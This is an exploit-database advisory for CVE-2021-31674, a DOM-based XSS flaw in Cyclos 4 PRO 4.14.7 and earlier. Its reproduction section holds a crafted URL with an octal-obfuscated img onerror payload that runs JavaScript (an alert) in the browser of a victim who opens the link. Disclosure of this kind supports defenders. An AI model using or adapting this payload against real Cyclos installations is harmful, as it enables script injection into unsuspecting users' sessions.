Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)

vendor:

Cyclos

by:

Tin Pham aka TF1T of VietSunshine Cyber Security Services

6.1

CVSS

MEDIUM

DOM Based Cross-Site Scripting (XSS)

CWE

Product Name: Cyclos

Affected Version From: Cyclos 4 PRO 4.14.7

Affected Version To: Cyclos 4 PRO 4.14.7 (and prior)

Patch Exists: No

Related CWE: CVE-2021-31674

CPE: a:cyclos:cyclos:4.14.7

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu

2021

Cyclos 4.14.7 – DOM Based Cross-Site Scripting (XSS)

Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.

Mitigation:

Implement proper input validation and sanitization techniques to prevent the execution of malicious javascript code.

Source

Exploit-DB raw data:

# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Date: 18/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31674

# Description: 
Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.

# Steps to reproduce: 
An attacker sends a draft URL

[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.

When a victim opens the URL, XSS will be triggered.